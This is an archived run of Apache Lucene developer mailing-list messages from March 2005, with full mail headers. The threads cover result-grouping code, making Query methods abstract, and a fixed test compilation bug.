2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 86513 invoked from network); 11 Mar 2005 03:26:58 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 11 Mar 2005 03:26:58 -0000 Received: (qmail 88821 invoked by uid 500); 11 Mar 2005 03:26:56 -0000 Delivered-To: [email protected] Received: (qmail 88790 invoked by uid 500); 11 Mar 2005 03:26:56 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 88776 invoked by uid 99); 11 Mar 2005 03:26:56 -0000 X-ASF-Spam-Status: No, hits=0.4 required=10.0 tests=DNS_FROM_RFC_ABUSE,RCVD_BY_IP,SPF_HELO_PASS,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (hermes.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from rproxy.gmail.com (HELO rproxy.gmail.com) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Thu, 10 Mar 2005 19:26:54 -0800 Received: by rproxy.gmail.com with SMTP id i8so746336rne for <[email protected]>; Thu, 10 Mar 2005 19:26:53 -0800 (PST) DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:reply-to:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:references; b=Q7hn3+ZpmYEgpdSz0/0j6tSUuW2cfkSLrdMPgfRmjJ4Q+t66vt1N9CV+9Q1bVgMLulDv2s4rQwhzxkOPuRtxb1Gzn9iplq8lu7bHUvUh8YvRcmNHtVov0Gt/vQqeuV5ryNryfJtXy4YWAvwQHJZNetIy5tQ3QmWrn80or67O6vE= Received: by 161.129.204.104 with SMTP id a51mr769132rnb; Thu, 10 Mar 2005 19:26:52 -0800 (PST) Received: by 161.129.204.104 with HTTP; Thu, 10 Mar 2005 19:26:52 -0800 (PST) Message-ID: <[email protected]> Date: Thu, 10 Mar 2005 21:26:52 -0600 From: Chris Lamprecht <[email protected]> Reply-To: Chris Lamprecht <[email protected]> To: [email protected] Subject: Re: Proposed Lucene modification - FieldCollector In-Reply-To: <[email protected]> Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit References: <[email protected]> X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Hi Mark, This is a good idea I hadn't though of. But I don't think it will work in my case, since I need the actual whole field values (i.e. "Sun Microsystems", not just the tokens, [sun] or [microsystems]). It might work if the fields happen to be indexed as keywords, but in my case they are not. -chris On Thu, 10 Mar 2005 07:58:59 +0000 (GMT), mark harwood <[email protected]> wrote: > >>To get complete statistics like > >>above, you currently have to iterate through the > result > >> set and pull each Document from the Hits. > > Not necessarily true. You can use TermVectors or an > indexed field eg "doctype" to derive this stuff > without stored fields. Here's an example of how I've > done it before using indexed fields. I've been meaning > to tidy this up and contribute this as it looks like > it could be generally useful. The "GroupKeyFactory" is > an abstraction which allows you to process a term > before using it for totalling eg to group dates on a > year rather than a full date. > > protected GroupTotal[] > groupByIndexTokens(GroupQueryParams params)throws > ParseException, IOException > { > final HashMap totals = new HashMap(); > final GroupingKeyFactory groupKeyFactory = > params.getGroupKeyFactory(); > String groupFieldName = > params.getGroupFieldName(); > //TODO IndexSearcher should be passed in and > resused? > IndexSearcher searcher = new > IndexSearcher(reader); > float minScore = params.getMinDocScore(); > final float scores[] = new > float[reader.numDocs()]; > String queryString=params.getQuery(); > > if((queryString==null)||(queryString.trim().length()==0)) > { > //TODO if query is null then we could > optimise counting by just taking docFreq > // from TermEnum and avoding use of > TermDocs? > Arrays.fill(scores,1); > } > else > { > Query query = null; > query = QueryParser.parse(params.getQuery(), > "contents", analyzer); > searcher.search(query, null, new > HitCollector() > { > public void collect(int docID, float > score) > { > scores[docID] = score; > } > }); > } > > TermEnum te = reader.terms(new > Term(groupFieldName, "")); > Term term = te.term(); > while (term!=null) > { > if (term.field().equals(groupFieldName)) > { > TermDocs termDocs = > reader.termDocs(term); > GroupTotal groupTotal = null; > > boolean continueThisTerm = true; > while ((continueThisTerm) && > (termDocs.next())) > { > int docID = termDocs.doc(); > float docScore = scores[docID]; > //TODO include logic to test > queryParams.includeZeroScore groups > if ((docScore > 0) && (docScore > > minScore)) > // > if(docScore>minScore) > { > if (groupTotal == null) > { > //look up the group key > and initialize > String termText = > term.text(); > Object key = termText; > if (groupKeyFactory != > null) > { > key = > groupKeyFactory.getGroupingKey(termText,docID); > if (key == null) > { > continueThisTerm = > false; > continue; > } > } > groupTotal = (GroupTotal) > totals.get(key); > if (groupTotal == null) > { > //no totals exist yet, > create new one. > groupTotal = new > GroupTotal(params > > .getReturnDocIdsWithGroups()); > > groupTotal.setGroupKey(key); > totals.put(key, > groupTotal); > > groupTotal.addToTotalDocFreq(te.docFreq()); > } > } > > groupTotal.addQueryMatchDoc(docID, scores[docID]); > } > } > } else > { > break; > } > if(te.next()) > { > term=te.term(); > } > else > { > break; > } > } > Collection result = totals.values(); > GroupTotal[] results = (GroupTotal[]) > result.toArray(new GroupTotal[result.size()]); > return results; > } > > Send instant messages to your online friends http://uk.messenger.yahoo.com > > --------------------------------------------------------------------- > To unsubscribe, e-mail: [email protected] > For additional commands, e-mail: [email protected] > > --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Fri Mar 11 09:16:23 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 51477 invoked from network); 11 Mar 2005 09:16:23 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 11 Mar 2005 09:16:23 -0000 Received: (qmail 27678 invoked by uid 500); 11 Mar 2005 09:16:21 -0000 Delivered-To: [email protected] Received: (qmail 27631 invoked by uid 500); 11 Mar 2005 09:16:20 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 27616 invoked by uid 99); 11 Mar 2005 09:16:20 -0000 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: neutral (hermes.apache.org: local policy) Received: from p15112568.pureserver.info (HELO p15112568.pureserver.info) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Fri, 11 Mar 2005 01:16:20 -0800 Received: from [161.129.204.104] (ppp-82-135-8-69.mnet-online.de [161.129.204.104]) (using TLSv1 with cipher RC4-MD5 (128/128 bits)) (No client certificate requested) by p15112568.pureserver.info (Postfix) with ESMTP id 96FD214010F for <[email protected]>; Fri, 11 Mar 2005 10:16:13 +0100 (CET) Message-ID: <[email protected]> Date: Fri, 11 Mar 2005 10:15:49 +0100 From: Bernhard Messer <[email protected]> User-Agent: Mozilla Thunderbird 0.8 (X11/20040913) X-Accept-Language: en-us, en MIME-Version: 1.0 To: [email protected] Subject: Re: subclasses of abstract Query class are not implementing all methods References: <[email protected]> <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N David Spencer wrote: > Bernhard Messer wrote: > >> Hi, >> >> I would like to cache query objects in a hash map. My implementation >> failed, because not all of the Query classes are implementing the >> necessary method: "public int hashCode()". The same counts for the >> "public boolean equals (Object o)", "public String toString(String >> fieldName)" and "public String toString()". To force all subclasses >> of Query to implement this 4 methods, i would like to make them >> abstract within the base class and implement the missing ones in the >> subclasses. So in Query class itself, it would look: >> >> public abstract String toString(String field); >> public abstract String toString(); > > > What's the point of toString() w/o an argument - this doesn't really > matter for Query does it? Having a clean implementation of toString(), one would be able to reparse a Query with QueryParser. This is something which was discussed several times on the dev and user lists. I expect that it will work for all queries supported by QueryParser. > > >> public abstract int hashCode(); >> public abstract boolean equals(Object o); >> >> I think this would make the API cleaner and more usable. >> >> Thoughts ??? >> >> Bernhard >> >> >> --------------------------------------------------------------------- >> To unsubscribe, e-mail: [email protected] >> For additional commands, e-mail: [email protected] >> > > > --------------------------------------------------------------------- > To unsubscribe, e-mail: [email protected] > For additional commands, e-mail: [email protected] > --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Fri Mar 11 15:18:32 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 47213 invoked from network); 11 Mar 2005 15:18:32 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 11 Mar 2005 15:18:32 -0000 Received: (qmail 5545 invoked by uid 500); 11 Mar 2005 15:18:30 -0000 Delivered-To: [email protected] Received: (qmail 5510 invoked by uid 500); 11 Mar 2005 15:18:29 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 5497 invoked by uid 99); 11 Mar 2005 15:18:29 -0000 X-ASF-Spam-Status: No, hits=0.4 required=10.0 tests=DNS_FROM_RFC_ABUSE,RCVD_BY_IP,SPF_HELO_PASS,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (hermes.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from rproxy.gmail.com (HELO rproxy.gmail.com) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Fri, 11 Mar 2005 07:18:28 -0800 Received: by rproxy.gmail.com with SMTP id g11so1381259rne for <[email protected]>; Fri, 11 Mar 2005 07:18:24 -0800 (PST) DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:reply-to:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:references; b=OWpSxZuR+PNY7iYtJHHGiKrQDo9MMVgDcsl3GKsjkOpRbbtG6pDOJ0oDtJCQ9lWN4T+8/DXr9Uq0WOUPVyGV5HelmDkfv+N0qcnkDQ+dY3vqYuIgTXSZCohDmUR5hGTu9+xkXDObv576OX3fEwCmMTAyYCUkOAeFCeSL0uknKSg= Received: by 161.129.204.104 with SMTP id n51mr2805772rnb; Fri, 11 Mar 2005 07:18:23 -0800 (PST) Received: by 161.129.204.104 with HTTP; Fri, 11 Mar 2005 07:18:23 -0800 (PST) Message-ID: <[email protected]> Date: Fri, 11 Mar 2005 10:18:23 -0500 From: Yonik Seeley <[email protected]> Reply-To: Yonik Seeley <[email protected]> To: [email protected] Subject: Re: subclasses of abstract Query class are not implementing all methods In-Reply-To: <[email protected]> Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit References: <[email protected]> <[email protected]> <[email protected]> X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N > Having a clean implementation of toString(), one would be able to > reparse a Query with QueryParser. This is something which was discussed > several times on the dev and user lists. I expect that it will work for > all queries supported by QueryParser. Only under certain restrictions. Remember that the QueryParser uses an Analyzer on field values, so it's impossible to guarantee that you can go from String->Query->String and have them match... -Yonik --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Sat Mar 12 00:43:09 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 852 invoked from network); 12 Mar 2005 00:43:08 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 12 Mar 2005 00:43:08 -0000 Received: (qmail 91754 invoked by uid 500); 12 Mar 2005 00:43:08 -0000 Delivered-To: [email protected] Received: (qmail 91297 invoked by uid 500); 12 Mar 2005 00:43:06 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 91276 invoked by uid 500); 12 Mar 2005 00:43:06 -0000 Delivered-To: [email protected] Received: (qmail 91273 invoked by uid 99); 12 Mar 2005 00:43:06 -0000 X-ASF-Spam-Status: No, hits=0.2 required=10.0 tests=NO_REAL_NAME X-Spam-Check-By: apache.org Received: from ajax-1.apache.org (HELO ajax.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Fri, 11 Mar 2005 16:43:05 -0800 Received: from ajax.apache.org (ajax.apache.org [161.129.204.104]) by ajax.apache.org (8.12.11/8.12.11) with ESMTP id j2C0h3Md021663 for <[email protected]>; Sat, 12 Mar 2005 01:43:03 +0100 Received: (from nobody@localhost) by ajax.apache.org (8.12.11/8.12.11/Submit) id j2C0h2k2021661; Sat, 12 Mar 2005 01:43:02 +0100 Date: Sat, 12 Mar 2005 01:43:02 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: DO NOT REPLY [Bug 33974] New: - Test compilation error X-Bugzilla-Reason: AssignedTo X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N DO NOT REPLY TO THIS EMAIL, BUT PLEASE POST YOUR BUG· RELATED COMMENTS THROUGH THE WEB INTERFACE AVAILABLE AT <http://issues.apache.org/bugzilla/show_bug.cgi?id=33974>. ANY REPLY MADE TO THIS MESSAGE WILL NOT BE COLLECTED AND· INSERTED IN THE BUG DATABASE. http://issues.apache.org/bugzilla/show_bug.cgi?id=33974 Summary: Test compilation error Product: Lucene Version: CVS Nightly - Specify date in submission Platform: PC OS/Version: Linux Status: NEW Severity: normal Priority: P2 Component: Index AssignedTo: [email protected] ReportedBy: [email protected] The Lucence test fails with the following error: (latest revision from SVN) compile-test: [mkdir] Created dir: /opt/lucene/lucene/build/classes/test [javac] Compiling 79 source files to /opt/lucene/lucene/build/classes/test [javac] /opt/lucene/lucene/src/test/org/apache/lucene/index/TermInfosTest.java:89: cannot resolve symbol [javac] symbol : constructor TermInfosWriter (org.apache.lucene.store.Directory,java.lang.String,org.apache.lucene.index.FieldInfos) [javac] location: class org.apache.lucene.index.TermInfosWriter [javac] TermInfosWriter writer = new TermInfosWriter(store, "words", fis); I see that TermInfosWriter was changed two days back to add another argument (interval) to its constructor. Mailing lists for Lucene do not seem to be responding (sending emails to subscribe bounces back and also I do not see any mails after March 2nd being archived in either the user or dev lists). So I am using the bug database to inform the test failure and submit a simple patch that uses the value of 128 (the default in the TermInfosWriter class) as interval in the test case. -- Configure bugmail: http://issues.apache.org/bugzilla/userprefs.cgi?tab=email ------- You are receiving this mail because: ------- You are the assignee for the bug, or are watching the assignee. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Sat Mar 12 00:44:39 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 1103 invoked from network); 12 Mar 2005 00:44:38 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 12 Mar 2005 00:44:38 -0000 Received: (qmail 92337 invoked by uid 500); 12 Mar 2005 00:44:37 -0000 Delivered-To: [email protected] Received: (qmail 92315 invoked by uid 500); 12 Mar 2005 00:44:37 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 92302 invoked by uid 500); 12 Mar 2005 00:44:37 -0000 Delivered-To: [email protected] Received: (qmail 92299 invoked by uid 99); 12 Mar 2005 00:44:37 -0000 X-ASF-Spam-Status: No, hits=0.4 required=10.0 tests=NO_REAL_NAME,UPPERCASE_25_50 X-Spam-Check-By: apache.org Received: from ajax-1.apache.org (HELO ajax.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Fri, 11 Mar 2005 16:44:35 -0800 Received: from ajax.apache.org (ajax.apache.org [161.129.204.104]) by ajax.apache.org (8.12.11/8.12.11) with ESMTP id j2C0iXDh021681 for <[email protected]>; Sat, 12 Mar 2005 01:44:33 +0100 Received: (from nobody@localhost) by ajax.apache.org (8.12.11/8.12.11/Submit) id j2C0iWbs021679; Sat, 12 Mar 2005 01:44:32 +0100 Date: Sat, 12 Mar 2005 01:44:32 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: DO NOT REPLY [Bug 33974] - Test compilation error X-Bugzilla-Reason: AssignedTo X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N DO NOT REPLY TO THIS EMAIL, BUT PLEASE POST YOUR BUG· RELATED COMMENTS THROUGH THE WEB INTERFACE AVAILABLE AT <http://issues.apache.org/bugzilla/show_bug.cgi?id=33974>. ANY REPLY MADE TO THIS MESSAGE WILL NOT BE COLLECTED AND· INSERTED IN THE BUG DATABASE. http://issues.apache.org/bugzilla/show_bug.cgi?id=33974 ------- Additional Comments From [email protected] 2005-03-12 01:44 ------- Created an attachment (id=14469) --> (http://issues.apache.org/bugzilla/attachment.cgi?id=14469&action=view) Patch to fix the compile error in the TermInfosTest -- Configure bugmail: http://issues.apache.org/bugzilla/userprefs.cgi?tab=email ------- You are receiving this mail because: ------- You are the assignee for the bug, or are watching the assignee. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Sat Mar 12 02:22:56 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 39367 invoked from network); 12 Mar 2005 02:22:55 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 12 Mar 2005 02:22:55 -0000 Received: (qmail 76766 invoked by uid 500); 12 Mar 2005 02:22:55 -0000 Delivered-To: [email protected] Received: (qmail 76313 invoked by uid 500); 12 Mar 2005 02:22:53 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 76300 invoked by uid 99); 12 Mar 2005 02:22:53 -0000 X-ASF-Spam-Status: No, hits=2.5 required=10.0 tests=DNS_FROM_RFC_ABUSE,FORGED_YAHOO_RCVD X-Spam-Check-By: apache.org Received-SPF: pass (hermes.apache.org: local policy) Received: from web31107.mail.mud.yahoo.com (HELO web31107.mail.mud.yahoo.com) (161.129.204.104) by apache.org (qpsmtpd/0.28) with SMTP; Fri, 11 Mar 2005 18:22:52 -0800 Received: (qmail 82769 invoked by uid 60001); 12 Mar 2005 02:22:51 -0000 Comment: DomainKeys? See http://antispam.yahoo.com/domainkeys DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=s1024; d=yahoo.com; b=kX1D/umXhQr+VY8cCqo/8NHclKyFbsbbFI40Qq8HcBm2b/q+JoviPMgDq6+2xkjvf5m8N32arZuZW+zOfWVimAZVZNPyp4VmiTjxjIdocJkknaFPK5rQln7MbmUgqOaO8U9MYToDBT+OZi3G1UUPwQEvfvYtoT7ozGal9zTP35Y= ; Message-ID: <[email protected]> Received: from [161.129.204.104] by web31107.mail.mud.yahoo.com via HTTP; Fri, 11 Mar 2005 18:22:50 PST Date: Fri, 11 Mar 2005 18:22:50 -0800 (PST) From: Otis Gospodnetic <[email protected]> Subject: TSS interview with Doug Cutting To: [email protected], [email protected] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Nobody posted a link, but I'm sure lots of people here would be interested in TSS' interview with Doug Cutting: http://theserverside.com/news/thread.tss?thread_id=32509 Otis --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Sat Mar 12 02:45:01 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 45668 invoked from network); 12 Mar 2005 02:45:01 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 12 Mar 2005 02:45:01 -0000 Received: (qmail 96897 invoked by uid 500); 12 Mar 2005 02:45:00 -0000 Delivered-To: [email protected] Received: (qmail 96433 invoked by uid 500); 12 Mar 2005 02:44:59 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 96419 invoked by uid 500); 12 Mar 2005 02:44:59 -0000 Delivered-To: [email protected] Received: (qmail 96416 invoked by uid 99); 12 Mar 2005 02:44:58 -0000 X-ASF-Spam-Status: No, hits=0.4 required=10.0 tests=NO_REAL_NAME,UPPERCASE_25_50 X-Spam-Check-By: apache.org Received: from ajax-1.apache.org (HELO ajax.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Fri, 11 Mar 2005 18:44:57 -0800 Received: from ajax.apache.org (ajax.apache.org [161.129.204.104]) by ajax.apache.org (8.12.11/8.12.11) with ESMTP id j2C2ittI010572 for <[email protected]>; Sat, 12 Mar 2005 03:44:55 +0100 Received: (from nobody@localhost) by ajax.apache.org (8.12.11/8.12.11/Submit) id j2C2isTC010568; Sat, 12 Mar 2005 03:44:54 +0100 Date: Sat, 12 Mar 2005 03:44:54 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: DO NOT REPLY [Bug 33974] - Test compilation error X-Bugzilla-Reason: AssignedTo X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N DO NOT REPLY TO THIS EMAIL, BUT PLEASE POST YOUR BUG· RELATED COMMENTS THROUGH THE WEB INTERFACE AVAILABLE AT <http://issues.apache.org/bugzilla/show_bug.cgi?id=33974>. ANY REPLY MADE TO THIS MESSAGE WILL NOT BE COLLECTED AND· INSERTED IN THE BUG DATABASE. http://issues.apache.org/bugzilla/show_bug.cgi?id=33974 [email protected] changed: What |Removed |Added ---------------------------------------------------------------------------- Status|NEW |RESOLVED Resolution| |FIXED ------- Additional Comments From [email protected] 2005-03-12 03:44 ------- Fixed. I used IndexWriter.DEFAULT_TERM_INDEX_INTERVAL instead. Thanks for the report and patch. -- Configure bugmail: http://issues.apache.org/bugzilla/userprefs.cgi?tab=email ------- You are receiving this mail because: ------- You are the assignee for the bug, or are watching the assignee. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Sat Mar 12 02:53:12 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 48089 invoked from network); 12 Mar 2005 02:53:12 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 12 Mar 2005 02:53:12 -0000 Received: (qmail 2861 invoked by uid 500); 12 Mar 2005 02:53:11 -0000 Delivered-To: [email protected] Received: (qmail 2409 invoked by uid 500); 12 Mar 2005 02:53:10 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 2396 invoked by uid 99); 12 Mar 2005 02:53:09 -0000 X-ASF-Spam-Status: No, hits=2.5 required=10.0 tests=DNS_FROM_RFC_ABUSE,FORGED_YAHOO_RCVD X-Spam-Check-By: apache.org Received-SPF: pass (hermes.apache.org: local policy) Received: from web31101.mail.mud.yahoo.com (HELO web31101.mail.mud.yahoo.com) (161.129.204.104) by apache.org (qpsmtpd/0.28) with SMTP; Fri, 11 Mar 2005 18:53:08 -0800 Received: (qmail 25184 invoked by uid 60001); 12 Mar 2005 02:53:06 -0000 Comment: DomainKeys? See http://antispam.yahoo.com/domainkeys DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=s1024; d=yahoo.com; b=BsZXVRasmGBdZcDIlmTnuvqX+p/t2osMTAHO+Fx1SeFkvliyaEuou9h0A2y75qjPNK1DSD7zpNLcNoNrWjCrbqlpx8pornj6duXgd14iHa1HWf+Dja4WXSSB6it+9JGJpDimlTzzUkErCepG8nsaStANb3eMVM62nUPhvMgx45o= ; Message-ID: <[email protected]> Received: from [161.129.204.104] by web31101.mail.mud.yahoo.com via HTTP; Fri, 11 Mar 2005 18:53:06 PST Date: Fri, 11 Mar 2005 18:53:06 -0800 (PST) From: Otis Gospodnetic <[email protected]> Subject: Re: Possible change to SVN repository link on Lucene main page To: [email protected] In-Reply-To: 6667 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Thanks, I'll change that. Otis --- Barry Hawkins <[email protected]> wrote: > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > Guys, > ~ I noticed that there is a view-cvs.cgi script at the base of > svn.apache.org, and that you can get a more useful view of the Lucene > repository by using a viewcvs link[0] rather than the raw repository > link[1] that is used on the main page[2] now. > > [0] - http://svn.apache.org/viewcvs.cgi/lucene > [1] - http://svn.apache.org/repos/asf/lucene > [2] - http://lucene.apache.org/java/docs/index.html > > Regards, > - -- > Barry Hawkins > All Things Computed > site: www.alltc.com > weblog: www.yepthatsme.com > > Registered Linux User #368650 > -----BEGIN PGP SIGNATURE----- > Version: GnuPG v1.4.0 (GNU/Linux) > > iD8DBQFCL2OG7bZ6kUftWZwRAk0UAKCPMjEhgEKDTlNPCEaPNMliCZ8V9gCgwL9f > 5WXNWXqlMhHsfhhEMpBtT10= > =6/tH > -----END PGP SIGNATURE----- > > --------------------------------------------------------------------- > To unsubscribe, e-mail: [email protected] > For additional commands, e-mail: [email protected] > > --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Sat Mar 12 03:31:27 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 59076 invoked from network); 12 Mar 2005 03:31:26 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 12 Mar 2005 03:31:26 -0000 Received: (qmail 31940 invoked by uid 500); 12 Mar 2005 03:31:25 -0000 Delivered-To: [email protected] Received: (qmail 31805 invoked by uid 500); 12 Mar 2005 03:31:24 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 31792 invoked by uid 500); 12 Mar 2005 03:31:24 -0000 Delivered-To: [email protected] Received: (qmail 31789 invoked by uid 99); 12 Mar 2005 03:31:24 -0000 X-ASF-Spam-Status: No, hits=0.4 required=10.0 tests=NO_REAL_NAME,UPPERCASE_25_50 X-Spam-Check-By: apache.org Received: from ajax-1.apache.org (HELO ajax.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Fri, 11 Mar 2005 19:31:23 -0800 Received: from ajax.apache.org (ajax.apache.org [161.129.204.104]) by ajax.apache.org (8.12.11/8.12.11) with ESMTP id j2C3VKfp027118 for <[email protected]>; Sat, 12 Mar 2005 04:31:20 +0100 Received: (from nobody@localhost) by ajax.apache.org (8.12.11/8.12.11/Submit) id j2C3VAct027115; Sat, 12 Mar 2005 04:31:10 +0100 Date: Sat, 12 Mar 2005 04:31:10 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: DO NOT REPLY [Bug 33820] - FIXME in src/test/org/apache/lucene/IndexTest.java X-Bugzilla-Reason: AssignedTo X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N DO NOT REPLY TO THIS EMAIL, BUT PLEASE POST YOUR BUG· RELATED COMMENTS THROUGH THE WEB INTERFACE AVAILABLE AT <http://issues.apache.org/bugzilla/show_bug.cgi?id=33820>. ANY REPLY MADE TO THIS MESSAGE WILL NOT BE COLLECTED AND· INSERTED IN THE BUG DATABASE. http://issues.apache.org/bugzilla/show_bug.cgi?id=33820 [email protected] changed: What |Removed |Added ---------------------------------------------------------------------------- Status|NEW |RESOLVED Resolution| |FIXED ------- Additional Comments From [email protected] 2005-03-12 04:31 ------- Thanks, applied. -- Configure bugmail: http://issues.apache.org/bugzilla/userprefs.cgi?tab=email ------- You are receiving this mail because: ------- You are the assignee for the bug, or are watching the assignee. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Sat Mar 12 03:40:02 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 61824 invoked from network); 12 Mar 2005 03:40:02 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 12 Mar 2005 03:40:02 -0000 Received: (qmail 40138 invoked by uid 500); 12 Mar 2005 03:40:00 -0000 Delivered-To: [email protected] Received: (qmail 40109 invoked by uid 500); 12 Mar 2005 03:40:00 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: 